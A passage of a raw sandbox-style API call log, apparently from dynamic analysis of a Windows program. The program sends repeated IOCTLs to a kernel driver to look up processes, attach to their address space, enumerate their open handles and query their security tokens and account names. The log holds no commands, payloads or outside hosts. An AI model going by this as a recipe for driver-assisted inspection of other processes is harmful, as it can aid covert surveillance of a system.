0xe [0247.585] ObQueryNameString (in: Object=0xfffffa8007bffb50, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.585] ObfDereferenceObject (Object=0xfffffa80026484e0) returned 0x2 [0247.585] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.585] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xad4) returned 0x0 [0247.585] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.585] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.585] PsLookupProcessByProcessId (in: ProcessId=0xad4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.585] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.586] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.586] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.586] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.586] PsLookupProcessByProcessId (in: ProcessId=0xad4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.586] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.586] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.586] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.586] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.586] PsLookupProcessByProcessId (in: ProcessId=0xad4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.586] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.586] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.586] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.586] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.586] PsLookupProcessByProcessId (in: ProcessId=0xad4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.586] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.586] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x93c) returned 0x0 [0247.586] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.586] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.586] PsLookupProcessByProcessId (in: ProcessId=0x93c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.586] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.586] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.586] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.586] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.586] PsLookupProcessByProcessId (in: ProcessId=0x93c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.586] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.586] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.587] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.587] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.587] PsLookupProcessByProcessId (in: ProcessId=0x93c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.587] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.587] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.587] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.587] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.587] PsLookupProcessByProcessId (in: ProcessId=0x93c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.587] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.587] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.587] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.587] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.587] PsLookupProcessByProcessId (in: ProcessId=0x93c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.587] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.587] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.587] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.587] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.587] PsLookupProcessByProcessId (in: ProcessId=0x93c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.587] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.587] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.587] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.587] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.587] PsLookupProcessByProcessId (in: ProcessId=0x93c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.587] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.587] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa20) returned 0xc8 [0247.587] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0247.588] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8003195b30, HandleInformation=0x0) returned 0x0 [0247.588] ObOpenObjectByPointer (in: Object=0xfffffa8003195b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0247.588] ObfDereferenceObject (Object=0xfffffa8003195b30) returned 0x20 [0247.588] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002545e80 | out: TokenHandle=0xfffffa8002545e80*=0xc4) returned 0x0 [0247.588] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0247.588] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.588] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0247.588] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0247.590] CloseHandle (hObject=0xc4) returned 1 [0247.590] CloseHandle (hObject=0xc8) returned 1 [0247.590] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.590] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0247.590] PsLookupProcessByProcessId (in: ProcessId=0xa20, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.590] PsAcquireProcessExitSynchronization () returned 0x0 [0247.590] KeStackAttachProcess (in: PROCESS=0xfffffa8003195b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003195b30, ApcState=0xfffff880053c85d0) [0247.590] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80024af510, HandleInformation=0x0) returned 0x0 [0247.590] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.590] PsReleaseProcessExitSynchronization () returned 0x2 [0247.590] ObfDereferenceObject (Object=0xfffffa8003195b30) returned 0x1e [0247.590] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.590] ObfDereferenceObject (Object=0xfffffa80024af510) returned 0x1 [0247.590] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.590] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.590] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.590] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0247.590] PsLookupProcessByProcessId (in: ProcessId=0xa20, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.590] PsAcquireProcessExitSynchronization () returned 0x0 [0247.590] KeStackAttachProcess (in: PROCESS=0xfffffa8003195b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003195b30, ApcState=0xfffff880053c85d0) [0247.590] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80030cbb70, HandleInformation=0x0) returned 0x0 [0247.590] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.591] PsReleaseProcessExitSynchronization () returned 0x2 [0247.591] ObfDereferenceObject (Object=0xfffffa8003195b30) returned 0x1e [0247.591] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.591] ObfDereferenceObject (Object=0xfffffa80030cbb70) returned 0x1 [0247.591] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.591] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.591] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.591] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x110, lpOverlapped=0x0) returned 1 [0247.591] PsLookupProcessByProcessId (in: ProcessId=0xa20, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.591] PsAcquireProcessExitSynchronization () returned 0x0 [0247.591] KeStackAttachProcess (in: PROCESS=0xfffffa8003195b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003195b30, ApcState=0xfffff880053c85d0) [0247.591] ObReferenceObjectByHandle (in: Handle=0x2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002fe06b0, HandleInformation=0x0) returned 0x0 [0247.591] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.591] PsReleaseProcessExitSynchronization () returned 0x2 [0247.591] ObfDereferenceObject (Object=0xfffffa8003195b30) returned 0x1e [0247.591] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.591] ObfDereferenceObject (Object=0xfffffa8002fe06b0) returned 0x1 [0247.591] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.591] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.591] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.591] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x2c, lpOverlapped=0x0) returned 1 [0247.591] PsLookupProcessByProcessId (in: ProcessId=0xa20, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.591] PsAcquireProcessExitSynchronization () returned 0x0 [0247.591] KeStackAttachProcess (in: PROCESS=0xfffffa8003195b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003195b30, ApcState=0xfffff880053c85d0) [0247.592] ObReferenceObjectByHandle (in: Handle=0x80, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80026484e0, HandleInformation=0x0) returned 0x0 [0247.592] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.592] PsReleaseProcessExitSynchronization () returned 0x2 [0247.592] ObfDereferenceObject (Object=0xfffffa8003195b30) returned 0x1e [0247.592] ObQueryNameString (in: Object=0xfffffa8007bffb50, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.592] ObfDereferenceObject (Object=0xfffffa80026484e0) returned 0x2 [0247.592] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.592] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.592] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.592] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0247.592] PsLookupProcessByProcessId (in: ProcessId=0xa20, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.592] PsAcquireProcessExitSynchronization () returned 0x0 [0247.592] KeStackAttachProcess (in: PROCESS=0xfffffa8003195b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003195b30, ApcState=0xfffff880053c85d0) [0247.592] ObReferenceObjectByHandle (in: Handle=0x98, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00231fd20, HandleInformation=0x0) returned 0x0 [0247.592] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.592] PsReleaseProcessExitSynchronization () returned 0x2 [0247.592] ObfDereferenceObject (Object=0xfffffa8003195b30) returned 0x1e [0247.592] ObQueryNameString (in: Object=0xfffff8a00231fd20, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8550) returned 0x0 [0247.592] ObfDereferenceObject (Object=0xfffff8a00231fd20) returned 0x2 [0247.592] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.592] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x540) returned 0x0 [0247.592] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.592] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.593] PsLookupProcessByProcessId (in: ProcessId=0x540, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.593] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.593] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.593] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.593] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.593] PsLookupProcessByProcessId (in: ProcessId=0x540, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.593] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.593] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x344) returned 0x0 [0247.593] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.593] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.593] PsLookupProcessByProcessId (in: ProcessId=0x344, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.593] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.593] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.593] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.593] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.593] PsLookupProcessByProcessId (in: ProcessId=0x344, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.593] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.593] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.593] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.593] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.593] PsLookupProcessByProcessId (in: ProcessId=0x344, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.593] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.594] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.594] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.594] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.594] PsLookupProcessByProcessId (in: ProcessId=0x344, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.594] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.594] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.594] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.594] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.594] PsLookupProcessByProcessId (in: ProcessId=0x344, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.594] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.594] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.594] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.594] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.594] PsLookupProcessByProcessId (in: ProcessId=0x344, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.594] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.594] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.594] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.594] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.594] PsLookupProcessByProcessId (in: ProcessId=0x344, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.594] IofCompleteRequest (Irp=0xfffffa80028d6780, 